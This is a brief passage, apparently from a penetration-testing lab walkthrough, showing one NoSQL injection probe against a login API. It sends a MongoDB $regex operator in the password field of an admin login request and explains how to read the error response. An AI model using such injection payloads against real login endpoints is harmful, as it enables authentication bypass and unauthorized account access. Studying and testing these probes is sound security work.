The login form sends JSON. Test if MongoDB operators are accepted by injecting $regex to match any password.
Command / Input
POST /api/login
{"username":"admin","password":{"$regex":".*"}}
Output
{"error":"Invalid credentials"}
⚑ If $regex returns an error vs. 401, the query parser is interpreting operators.